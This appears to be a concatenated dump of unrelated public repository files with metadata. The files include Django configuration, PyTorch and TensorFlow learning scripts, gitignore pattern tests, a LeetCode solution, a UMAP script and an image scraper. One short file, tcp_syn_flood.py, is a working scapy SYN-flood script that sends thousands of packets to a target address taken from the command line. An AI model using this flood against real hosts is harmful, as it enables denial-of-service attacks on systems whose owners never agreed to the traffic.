# Application definition
INSTALLED_APPS = [
'apps.RWG_app',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mainRandomWordGenerator.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mainRandomWordGenerator.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
'static',
]
| [
"irwansoetandar@Irwans-MacBook-Pro.local"
] | irwansoetandar@Irwans-MacBook-Pro.local |
476e1aaa13a5d3caf85e716770bd3a375b390ac8 | 4a427ec26d3734e3c8ffa92728d36fe1b9ae200f | /torch/01-intro.py | dd037586a8dd28ea8755888e256fb322edb5d930 | [
"MIT"
] | permissive | ShixiangWang/MLnotes | 0c82a777788d3866048ab12a5d965aa18285e305 | 10ef8b0be51c3e7eb1973a30410f0501f43db21e | refs/heads/master | 2021-03-12T02:44:38.724062 | 2020-12-27T16:44:25 | 2020-12-27T16:44:25 | 246,582,973 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py | # source: https://pytorch.apachecn.org/docs/1.4/blitz/tensor_tutorial.html
# Run in R start
reticulate::use_python("/Users/wsx/Library/r-miniconda/bin/python", required = T)
# reticulate::repl_python()
# Run in R end
from __future__ import print_function
import torch
# TENSOR ----------------------
# Empty tensor
x = torch.empty(5, 3)
print(x)
# Random tensor
x = torch.rand(5, 3)
print(x)
# Zero matrix with long data type
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# Construct tensor from data
x = torch.tensor([5, 3])
print(x)
# Construct tensor based on tensor
x = x.new_ones(5, 3, dtype=torch.double) # new_* methods take in sizes
print(x)
x = torch.randn_like(x, dtype=torch.float) # 重载 dtype!
print(x) # 结果size一致
# Shape of tensor
print(x.size())
# OPERATIONS ---------------
# +
y = torch.rand(5, 3)
print(x + y)
print(torch.add(x, y))
result = torch.empty(5, 3)
torch.add(x, y, out=result) # The output tensor is given
print(result)
y.add_(x) # Add in place
print(y)
# More in-place modification functions are end with '_'
# Index
print(x[:, 1])
# Change shape
x = torch.randn(4, 4)
y = x.view(16)
z = x.view(-1, 8) # the size -1 is inferred from other dimensions
print(x.size(), y.size(), z.size())
# Transform one-element tensor to scalar
x = torch.randn(1)
print(x)
print(x.item())
# More available at <https://pytorch.org/docs/stable/torch.html>
# CONNECT to NumPy -----------------
a = torch.ones(5)
print(a)
a.numpy()
# b is a reference
b = a.numpy()
print(b)
a.add_(1)
print(a)
print(b)
# ndarray to tensor
import numpy as np
a = np.ones(5)
b = torch.from_numpy(a)
np.add(a, 1, out=a)
print(a)
print(b)
# CPU上的所有张量(CharTensor除外)都支持与Numpy的相互转换。
# TENSOR in CUDA -----------------
# 当GPU可用时,我们可以运行以下代码
# 我们将使用`torch.device`来将tensor移入和移出GPU
if torch.cuda.is_available():
device = torch.device("cuda") # a CUDA device object
y = torch.ones_like(x, device=device) # 直接在GPU上创建tensor
x = x.to(device) # 或者使用`.to("cuda")`方法
z = x + y
print(z)
print(z.to("cpu", torch.double)) # `.to`也能在移动时改变dtype
# PyTorch中,所有神经网络的核心是 autograd 包。
# 先简单介绍一下这个包,然后训练我们的第一个的神经网络。
#
# autograd 包为张量上的所有操作提供了自动求导机制。
# 它是一个在运行时定义(define-by-run)的框架,
# 这意味着反向传播是根据代码如何运行来决定的,并且每次迭代可以是不同的。
# torch.Tensor 是这个包的核心类。如果设置它的属性 .requires_grad 为 True,
# 那么它将会追踪对于该张量的所有操作。当完成计算后可以通过调用 .backward(),
# 来自动计算所有的梯度。这个张量的所有梯度将会自动累加到.grad属性.
#
# 要阻止一个张量被跟踪历史,可以调用 .detach() 方法将其与计算历史分离,
# 并阻止它未来的计算记录被跟踪。
#
# 为了防止跟踪历史记录(和使用内存),可以将代码块包装在 with torch.no_grad(): 中。
# 在评估模型时特别有用,因为模型可能具有 requires_grad = True 的可训练的参数,
# 但是我们不需要在此过程中对他们进行梯度计算。
#
# 还有一个类对于autograd的实现非常重要:Function。
#
# Tensor 和 Function 互相连接生成了一个无圈图(acyclic graph),
# 它编码了完整的计算历史。每个张量都有一个 .grad_fn 属性,
# 该属性引用了创建 Tensor 自身的Function
# (除非这个张量是用户手动创建的,即这个张量的 grad_fn 是 None )。
#
# 如果需要计算导数,可以在 Tensor 上调用 .backward()。
# 如果 Tensor 是一个标量(即它包含一个元素的数据),
# 则不需要为 backward() 指定任何参数,但是如果它有更多的元素,
# 则需要指定一个 gradient 参数,该参数是形状匹配的张量。
import torch
x = torch.ones(2, 2, requires_grad=True)
print(x)
| [
"wangshx@shanghaitech.edu.cn"
] | wangshx@shanghaitech.edu.cn |
8b4e5247879570909d58dd7ce8f1c75b67082f07 | 7bc8807c261adccb2e71c97e01ce48b8c13d529d | /Day_14_01_RnnJenaClimate.py | 9e47d0fdf370ad1bbe5a34b779cdaddfec9b524a | [] | no_license | yunhui21/CB_AI_3_NLP | 4e090f028123621978164ad29d9789767c1ec0b0 | 20485ce5bae472d1b63b58adf69207a2837bb96a | refs/heads/main | 2023-01-30T11:10:41.385293 | 2020-12-17T03:56:53 | 2020-12-17T03:56:53 | 309,216,161 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,821 | py | # Day_14_01_RnnJenaClimate.py
import pandas as pd
import tensorflow.compat.v1 as tf
import numpy as np
tf.disable_eager_execution()
# 문제
# 파일에 있는 'T(degC)'컬럼을 RNN 알고리즘을 사용하지 말고
# 리니어 리그레션 알고리즘을 평균 오차를 계산하세요.
# baseline model
# print('mae:', np.mean(np.abs(degc[:-144]-degc[144:])))
# 문제
# jena파일에 있는 온데 데이터를 RNN 알고리즘으로 평균 오차를 계산하세요.
# 'p (mbar)', 'T (degC)', 'rho (g/m**3)'
def jena_regression():
jena = pd.read_csv('data/jena_climate_2009_2016.csv', index_col=0)
degc = jena['T (degC)'].values
degc = degc[:1000]
x, y = degc[:-144], degc[:-144]
# float type값으로.
w = tf.Variable(np.random.normal([1]), dtype=tf.float32)
b = tf.Variable(np.random.normal([1]), dtype=tf.float32)
hx = w * x + b
loss_i = (hx-y)**2 # mean square error
loss = tf.reduce_mean(loss_i)
# optimizer = tf.train.AdamOptimizer(0.1)
optimizer = tf.train.GradientDescentOptimizer(0.001)
train = optimizer.minimize(loss)
sess = tf.compat.v1.Session()
sess.run(tf.global_variables_initializer())
for i in range(100):
sess.run(train)
print(i, sess.run(loss))
preds = sess.run(hx)
# print(preds.shape)# (856,)-(856,) ->
print('mae:', np.mean(np.abs(preds-y))) # mae: 2.612549101228096
sess.close()
def rnn_jena_multi_columns():
jena = pd.read_csv('data/jena_climate_2009_2016.csv', index_col=0)
# jena = jena[['p (mbar)','T (degC)','rho (g/m**3)']].values
jena = [jena['p (mbar)'], jena['rho (g/m**3)'], jena['T (degC)']]
print(np.array(jena).shape) # (420551, 3)
jena = np.transpose(jena)
jena = jena[:1000]
# (420551, 3)
seq_len = 144
rng = range(len(jena) - seq_len)
x = [jena[s:s + seq_len] for s in rng]
y = [jena[s + seq_len, -1:] for s in rng]
x, y = np.float32(x), np.float32(y)
print(x.shape, y.shape) # (568, 432, 3) (568, 3)
hidden_size, n_features = 150, 3
ph_x = tf.placeholder(tf.float32, shape=[None, seq_len, n_features]) #
ph_y = tf.placeholder(tf.float32) #
cells = [tf.nn.rnn_cell.BasicRNNCell(num_units=hidden_size) for _ in range(2)]
multi = tf.nn.rnn_cell.MultiRNNCell(cells)
outputs, _states = tf.nn.dynamic_rnn(multi, ph_x, dtype=tf.float32)
hx = tf.layers.dense(outputs[:, -1, :], 1, activation=None)
loss_i = (hx-ph_y)**2 # mean square error
loss = tf.reduce_mean(loss_i)
optimizer = tf.train.AdamOptimizer(0.001)
train = optimizer.minimize(loss)
sess = tf.compat.v1.Session()
sess.run(tf.global_variables_initializer())
epochs = 10
batch_size = 100 # 한번에 처리할 데이터개수
n_iteration = len(x) // batch_size # epochs한번에 배치사이즈만큼의 횟수
indices = np.arange(len(x)) # 0 ~ 855 까지 일련번호 숫자.
for i in range(epochs):
np.random.shuffle(indices) # 원본데이터는 시계열이지만 슬라이싱으로 작업하면서 데이터가 시계열이 아니게 되었다.
total = 0
for j in range(n_iteration): # 60000의 데이터 100으로 나누어
n1 = j * batch_size # 0, 100, 200, 300
n2 = n1 + batch_size # 100, 200, 300, 400
xx = x[indices[n1:n2]]
yy = y[indices[n1:n2]]
sess.run(train, {ph_x: xx, ph_y: yy})
total += sess.run(loss, {ph_x:xx, ph_y:yy})
print(i, total/n_iteration )
preds = sess.run(hx, {ph_x: x})
print(preds.shape, y.shape) #(856, 1) (856, 3)
print('mae:', np.mean(np.abs(preds-y))) # mae: 2.612549101228096
# shuffle 적용 mae: 0.74608696
sess.close()
jena_regression()
# rnn_jena_multi_columns() | [
"system290!"
] | system290! |
672536c5a78c1821ed185f29deec88d12a96c027 | 4a59725520ec67cd3223ca79406a5c05263b8174 | /venv/bin/numba | 88963b566e8c81ce2d2fd66c61c6b11e08fd280c | [] | no_license | cem-ergin/yapayzeka | 5dc9d9b8ed092e0c61c8de3bb1f8daf3af299b8d | 13a0e37e3d88a8588bd3c409703e3499b5f332b4 | refs/heads/master | 2020-05-24T05:26:29.324399 | 2019-05-29T16:35:25 | 2019-05-29T16:35:25 | 187,115,522 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | #!/Users/cemergin/PycharmProjects/yapayzeka/venv/bin/python
# -*- coding: UTF-8 -*-
from __future__ import print_function, division, absolute_import
from numba.numba_entry import main
if __name__ == "__main__":
main()
| [
"cemergin@Cems-MacBook-Pro.local"
] | cemergin@Cems-MacBook-Pro.local | |
b803320c41ef1cc5d7a03074a2f5d6ec58e89096 | 2dbe308f30eb82043d3b366ffa176312b0133000 | /apps/accounts/urls.py | 123eda75119040a6bf6fc2c2c83977a7bd358c47 | [] | no_license | begalievv/food_blog | f923038f93cbe52c417e364b12872a92de91192d | 7cc32f90ba45cd25c7299920551a1d00abd26108 | refs/heads/master | 2021-02-04T22:36:12.853155 | 2020-03-11T13:18:30 | 2020-03-11T13:18:30 | 243,717,061 | 0 | 0 | null | 2020-02-28T11:56:43 | 2020-02-28T08:45:54 | CSS | UTF-8 | Python | false | false | 1,112 | py | from django.urls import path, include
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
# path('login/', views.user_login, name='login')
path('cabinet/', views.CabinetView.as_view(), name='cabinet'),
path('register/', views.register, name='register'),
path('login/', auth_views.LoginView.as_view(), name='login'),
path('logout/', auth_views.LogoutView.as_view(), name='logout'),
path('', views.dashboard, name='dashboard'),
path('password_change/', auth_views.PasswordChangeView.as_view(), name='password_change'),
path('password_change/done/', auth_views.PasswordChangeDoneView.as_view(), name='password_change_done'),
path('password_reset/', auth_views.PasswordResetView.as_view(), name='password_reset'),
path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(), name='password_reset_done'),
path('reset/<uidb64>/<token>/', auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
path('reset/done/', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),
]
| [
"begaliev0020"
] | begaliev0020 |
a8bff56768deed40c1ce40e95c7cd3fc9a647f51 | ea42b426901e76f31a97112fc147f6855c422de2 | /plugins/CPS_ALID_P1_SD5.py | b91692544c355548f03794ce0953e6c9c17d7e43 | [] | no_license | SidduSai/CPS-data-retrieval-and-manipulation | 51d426eee49ace8dd066e0bacfbc361388588e6e | d890a247ca8e12b12d07b24f56d16f7cd355b028 | refs/heads/master | 2021-07-05T20:41:02.855279 | 2017-10-01T16:48:26 | 2017-10-01T16:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | from data import Pump, PLC
from data import LIT
import time
name = 'CPS_ALID_P1_SD5'
def isViolated():
p101 = Pump(1, 101)
p102 = Pump(1, 102)
lit301 = LIT(3, 301)
p1 = PLC(1)
if lit301.isLow and p1.isNotOne:
time.sleep(12)
if all(p.isOff for p in [p101, p102]):
return True
return False
| [
"noreply@github.com"
] | SidduSai.noreply@github.com |
2b330045f3055f985f7d6be73ed716a8c547a2b8 | a309d0b9e7a0dd23764125892d59de4911d9186c | /Sipder_origin.py | 0e60dfa0895ffafc34dbb4bbe3132401ce010811 | [] | no_license | fengx1a0/EmojiSipder | 7d8a24831ce8e025128793cf855b3e4576c938f5 | b3be463d233323f1f344eb8dd2fe23947a0d97bc | refs/heads/master | 2023-08-25T21:02:03.982817 | 2021-10-14T16:46:22 | 2021-10-14T16:46:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | py | import requests
import re
import os
import time
import sys
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36"
}
def get_info(_id,page_num):
url = "https://fabiaoqing.com/tag/detail/id/%d/page/%d.html"%(_id,1)
res = requests.get(url=url,headers=headers)
items = re.findall(r'data-original="([^"]+)" title="([^"]+)"',res.text)
title = re.findall(r'<title>(.*?)</title>',res.text).pop().split("-").pop(0)
page = re.findall(r'[\S\n\s]{200}下一页',res.text)
if page:
page = page[1].split("<").pop(0).strip()
page = page if int(page) <= page_num else page_num
for i in range(2,int(page)+1):
print("Loading Page...",title,i)
url = "https://fabiaoqing.com/tag/detail/id/%d/page/%d.html"%(_id,i)
res = requests.get(url=url,headers=headers)
items.extend(re.findall(r'data-original="([^"]+)" title="([^"]+)"',res.text))
return items,title
def download(_ids,page_num):
items,title = get_info(_ids,page_num)
title = title.strip()
if not os.path.exists("./Database"):
os.mkdir("./Database")
if title and not os.path.exists("./Database/" + title):
os.mkdir("./Database/" + title)
for item in items:
url = item[0].replace("bmiddle","large")
filename = item[1].replace("/","").replace(".","").replace("\\","").replace("*","").replace(":","").replace("\n","").replace("\r","").replace("?","").replace(">","").replace("<","").replace("\"","").replace("\'","").replace("|","").strip()
try:
req = requests.get(url,headers=headers,timeout=3)
if req.status_code != 200:
continue
print("Staring Download...",filename)
with open("./Database/"+title+"/"+filename+'.jpg',"wb") as fs:
fs.write(req.content)
except:
pass
def main(depth,page_num):
for i in range(1,depth):
download(i,page_num)
if __name__ == '__main__':
print("data will saved into folder `./Database`")
if len(sys.argv) != 3:
exit("Invaild Option:\n\npython fidder.py DEPTH MAX_PAGE_NUM_OF_EACH\n\nExample: python fiddle.py 10 10")
main(int(sys.argv[1]),int(sys.argv[2])) | [
"m16605296117@163.com"
] | m16605296117@163.com |
4a21840fb38bac5c76ca8f9866e2127559e177c1 | a4a236c776b7c51ee0022fbf9e40296047f3fbb2 | /ll_roman_to_int.py | d176d68c48077af86e36e3a94db1672b503ac094 | [] | no_license | NataliyaPavlova/LeetCode | 28349b4e4b8f08524b462fefc385c0c781cf447a | 2ee1d892ab7cc24804e22f653b6641562de637cf | refs/heads/master | 2020-04-04T17:17:23.663085 | 2019-01-25T08:58:09 | 2019-01-25T08:58:09 | 156,114,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | '''
Given a roman numeral, convert it to an integer. Input is guaranteed to be within the range from 1 to 3999.
'''
class Solution(object):
def romanToInt(self, s):
"""
:type s: str
:rtype: int
"""
answer=0
roman_dict={'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000,
'IV': 4,
'IX': 9,
'XL': 40,
'XC': 90,
'CD': 400,
'CM': 900
}
i=0
while i<len(s):
if i+1<len(s) and s[i]+s[i+1] in roman_dict.keys():
answer+=roman_dict[s[i]+s[i+1]]
i+=1
else:
answer+=roman_dict[s[i]]
i+=1
#print(answer)
return answer
| [
"nataliya.s.pavlova@gmail.com"
] | nataliya.s.pavlova@gmail.com |
1ced1e5bd8b38f823f7c72e74c340613a4c11f63 | a9c0daa4a7b9a4d7341afcab270c5b5debb8c13f | /env/lib/python3.6/site-packages/pathspec/tests/test_gitignore.py | af1ee7a82daa8a6f90fb940d7c15e127faf3eb7e | [] | no_license | phamcong/alienator-plf | bad8c4e003fd189c43243b31ef2b975b6f154754 | ea65628af66fbca51f2248ceb4ba93f858dbddce | refs/heads/master | 2022-11-26T01:28:38.286261 | 2017-11-07T15:12:08 | 2017-11-07T15:12:08 | 109,412,097 | 0 | 1 | null | 2020-07-25T23:43:17 | 2017-11-03T15:30:22 | JavaScript | UTF-8 | Python | false | false | 5,066 | py | # encoding: utf-8
"""
This script tests ``GitIgnorePattern``.
"""
import unittest
import pathspec.util
from pathspec import GitIgnorePattern
class GitIgnoreTest(unittest.TestCase):
"""
The ``GitIgnoreTest`` class tests the ``GitIgnorePattern``
implementation.
"""
def test_00_empty(self):
"""
Tests an empty pattern.
"""
spec = GitIgnorePattern('')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_01_absolute_root(self):
"""
Tests a single root absolute path pattern.
This should NOT match any file (according to git check-ignore (v2.4.1)).
"""
spec = GitIgnorePattern('/')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_01_absolute(self):
"""
Tests an absolute path pattern.
This should match:
an/absolute/file/path
an/absolute/file/path/foo
This should NOT match:
foo/an/absolute/file/path
"""
spec = GitIgnorePattern('/an/absolute/file/path')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^an/absolute/file/path(?:/.*)?$')
def test_01_relative(self):
"""
Tests a relative path pattern.
This should match:
spam
spam/
foo/spam
spam/foo
foo/spam/bar
"""
spec = GitIgnorePattern('spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')
def test_01_relative_nested(self):
"""
Tests a relative nested path pattern.
This should match:
foo/spam
foo/spam/bar
This should **not** match (according to git check-ignore (v2.4.1)):
bar/foo/spam
"""
spec = GitIgnorePattern('foo/spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^foo/spam(?:/.*)?$')
def test_02_comment(self):
"""
Tests a comment pattern.
"""
spec = GitIgnorePattern('# Cork soakers.')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_02_ignore(self):
"""
Tests an exclude pattern.
This should NOT match (according to git check-ignore (v2.4.1)):
temp/foo
"""
spec = GitIgnorePattern('!temp')
self.assertIsNotNone(spec.include)
self.assertFalse(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?temp$')
def test_03_child_double_asterisk(self):
"""
Tests a directory name with a double-asterisk child
directory.
This should match:
spam/bar
This should **not** match (according to git check-ignore (v2.4.1)):
foo/spam/bar
"""
spec = GitIgnorePattern('spam/**')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^spam/.*$')
def test_03_inner_double_asterisk(self):
"""
Tests a path with an inner double-asterisk directory.
This should match:
left/bar/right
left/foo/bar/right
left/bar/right/foo
This should **not** match (according to git check-ignore (v2.4.1)):
foo/left/bar/right
"""
spec = GitIgnorePattern('left/**/right')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^left(?:/.+)?/right(?:/.*)?$')
def test_03_only_double_asterisk(self):
"""
Tests a double-asterisk pattern which matches everything.
"""
spec = GitIgnorePattern('**')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^.+$')
def test_03_parent_double_asterisk(self):
"""
Tests a file name with a double-asterisk parent directory.
This should match:
foo/spam
foo/spam/bar
"""
spec = GitIgnorePattern('**/spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')
def test_04_infix_wildcard(self):
"""
Tests a pattern with an infix wildcard.
This should match:
foo--bar
foo-hello-bar
a/foo-hello-bar
foo-hello-bar/b
a/foo-hello-bar/b
"""
spec = GitIgnorePattern('foo-*-bar')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?foo\\-[^/]*\\-bar(?:/.*)?$')
def test_04_postfix_wildcard(self):
"""
Tests a pattern with a postfix wildcard.
This should match:
~temp-
~temp-foo
~temp-foo/bar
foo/~temp-bar
foo/~temp-bar/baz
"""
spec = GitIgnorePattern('~temp-*')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?\\~temp\\-[^/]*(?:/.*)?$')
def test_04_prefix_wildcard(self):
"""
Tests a pattern with a prefix wildcard.
This should match:
bar.py
bar.py/
foo/bar.py
foo/bar.py/baz
"""
spec = GitIgnorePattern('*.py')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?[^/]*\\.py(?:/.*)?$')
def test_05_directory(self):
"""
Tests a directory pattern.
This should match:
dir/
foo/dir/
foo/dir/bar
This should **not** match:
dir
"""
spec = GitIgnorePattern('dir/')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?dir/.*$')
def test_05_registered(self):
"""
Tests that the pattern is registered.
"""
self.assertIs(pathspec.util.lookup_pattern('gitignore'), GitIgnorePattern)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(GitIgnoreTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"ccuong.ph@gmail.com"
] | ccuong.ph@gmail.com |
2c84e1184dcff48a9f0361defaecc42d83e013f5 | 3136e4218e913212fda9c64b68155d4dd203ee2a | /UMAP_paper.py | aa9a9cd577ab9a37ff34d8bd1d036f69c2f7e36f | [] | no_license | anhlpham/kmeans_Femodel | 8ff27c94c8c25f3bac5a0064a70da3b04cadc53b | 8588f190ea06321224f59929a0e922bc653b962a | refs/heads/master | 2021-07-18T06:19:24.545755 | 2020-07-09T15:36:31 | 2020-07-09T15:36:31 | 191,383,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | # -*- coding: utf-8 -*-
"""
Created on %(date)s
@author: %(username)s
"""
import numpy as np
from sklearn.datasets import load_iris, load_digits
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from scipy.io import loadmat
from numpy import linspace
from numpy import meshgrid
from matplotlib.backends.backend_pdf import PdfPages
%matplotlib inline
sns.set(style='white', context='notebook', rc={'figure.figsize':(14,10)})
annots = loadmat('Parekh_dust2.mat')
annots.keys()
Xn = annots['Xn'];
type(annots['Xn']),annots['Xn'].shape
IDX_new = annots['IDX_new']
IDX = np.reshape(IDX_new,(35456))
target = np.array([1, 2, 3, 4]);
print(Xn)
print(type(Xn))
X_df = pd.DataFrame(Xn)
X_df['class'] = pd.Series(IDX)
#.map(dict(zip(range(3),target)))
with PdfPages('Visulization.pdf') as pdf:
sns.pairplot(X_df, hue='class');
pdf.savefig()
import umap
reducer = umap.UMAP()
embedding = reducer.fit_transform(Xn)
embedding.shape
plt.scatter(embedding[:, 0], embedding[:, 1], c=[sns.color_palette()[x] for x in IDX])
plt.gca().set_aspect('equal', 'datalim')
plt.title('UMAP projection of sFe-dust model', fontsize=24);
plt.savefig('UMAP-sFe-dust.pdf') | [
"noreply@github.com"
] | anhlpham.noreply@github.com |
e914343fa85ca6d3f23aeda9938362687fbe0344 | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc146/abc146_c/8937880.py | ee9c12a0ce700fce574a65e29313213efa3efaa3 | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | A, B, X = map(int, input().split())
minN = 1
maxN = 10**9
ans = 0
while(1):
N = (minN + maxN) // 2
n = A*N + len(str(N))*B
if n <= X:
ans = N
if minN == maxN:
break
if n < X:
minN = N+1
else:
maxN = N
print(ans)
| [
"kouhei.k.0116@gmail.com"
] | kouhei.k.0116@gmail.com |
034fbb107abd9dc6e34d47c3bcf37d032990de10 | ba22c05a40f965d5aae44a3d1a909fb23195645a | /test_hvlfilereader.py | b9d35962ddf521c556d1c2e66a385b2f0e31c12c | [] | no_license | bernienor/hvlreader | dd6021c27f4ea092d53345c999b7074c37719bd5 | 9fee58c2946bac24fcf0c888bb596fc7175c86a4 | refs/heads/master | 2020-03-13T19:49:30.756512 | 2018-05-16T13:06:20 | 2018-05-16T13:06:20 | 131,261,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,605 | py | # Unittest module for hvlfilereader
import unittest
import hvlfilereader as hvlfr
import numpy as np
'''>>> dir(self.fr1)
['__class__', '__delattr__', '__dict__', '__dir__', '__doc__',
'__eq__', '__format__', '__ge__', '__getattribute__', '__gt__',
'__hash__', '__init__', '__init_subclass__', '__le__', '__lt__',
'__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__',
'__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__',
'__weakref__', 'data', 'header', 'identifyfile', 'instrumenttype',
'model', 'samplerate']
'''
class tektronixfrTestCase(unittest.TestCase):
"""Tests for `hvlfilereader.py`."""
def setUp(self):
self.fr1 = hvlfr.tektronixfr(
'testfiles/tektronix_DPO2012B/T0001CH1.CSV')
pass
def tearDown(self):
pass
def test_tekfr_T0001CH1(self):
self.assertIsInstance(self.fr1.data, np.ndarray)
self.assertIsInstance(self.fr1.header, list)
self.assertIsInstance(self.fr1.instrumenttype, str)
self.assertIsInstance(self.fr1.model, str)
self.assertIsInstance(self.fr1.samplerate, float)
self.assertEqual(self.fr1.data.size, 18747)
self.assertEqual(self.fr1.data.shape, (6249, 3))
self.assertEqual(self.fr1.instrumenttype, 'Tektronix oscilioscope')
self.assertEqual(self.fr1.model, 'DPO2012B')
# You have to compute the delta to secure the resolution
self.assertAlmostEqual(self.fr1.samplerate, 1.6e-07,
delta=(self.fr1.samplerate/1.0e7))
if __name__ == '__main__':
unittest.main()
| [
"bhhe@hvl.no"
] | bhhe@hvl.no |
30ac3811a3b1bd1fe781ad76f925c49dc1176111 | 84888c7f9d6d7195917053b2d14b2d30e1e5e375 | /stress_testing/tcp_syn_flood.py | 165848ca4522c0e0c341fb99281fc5f23da65896 | [] | no_license | codeandrew/offensivesecurity-python | a8d48c565d2434430e6f0e3069385b19dfbdef60 | 364ff7233c31a4a853f9ef185f96078e50c7bef4 | refs/heads/master | 2023-08-17T11:23:44.852329 | 2023-08-02T14:54:37 | 2023-08-02T14:54:37 | 242,969,080 | 12 | 5 | null | 2023-09-04T16:45:25 | 2020-02-25T10:10:59 | Python | UTF-8 | Python | false | false | 628 | py | from scapy.all import *
import sys
def main(target_ip, target_port, rounds=10_000):
print(f"Target IP: {target_ip}")
print(f"Target Port: {target_port}")
print(f"Rounds: {rounds}")
# Define the payload to send in the packets
payload = "A" * 1024
# Create a loop to send a large number of packets to the target
for i in range(rounds):
packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload
send(packet, verbose=False)
if __name__ == "__main__":
target_ip = sys.argv[1]
target_port = int(sys.argv[2])
main(target_ip=target_ip, target_port=target_port)
| [
"jeanandrewfuentes@gmail.com"
] | jeanandrewfuentes@gmail.com |
ed59c8429e16034cc54de92822ca1098379ed85b | ea9cdb2e9a4d47d4f5e4141dbdb271d57133a20d | /input.py | d6bb96a93a6553a5ec42ad6705b4e87dbfe4f2ad | [] | no_license | ActronikaSAS/libtup-python | 1295a1d06e600f63874c1b138f249b6c1492c58f | d81c76e8846708f56c4c8f895b6200470a7e2a57 | refs/heads/master | 2020-12-15T13:33:47.590182 | 2018-03-21T09:05:56 | 2018-03-21T09:05:56 | 235,119,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 762 | py | INT32_MAX = 2**31 - 1
INT32_MIN = -1 * 2**31
class Input(object):
def __init__(self, id=0, value=0):
self.id = id
self.value = value
def __str__(self):
return "<id: {}, value: {}>".format(self._id, self._value)
def __eq__(self, other):
return self._id == other._id and self._value == other._value
@property
def id(self):
return self._id
@id.setter
def id(self, id):
if isinstance(id, int):
if 0 <= id <= 255:
self._id = id
@property
def value(self):
return self._value
@value.setter
def value(self, value):
if isinstance(value, int):
if INT32_MIN <= value <= INT32_MAX:
self._value = value
| [
"jeremy.cheynet@actronika.com"
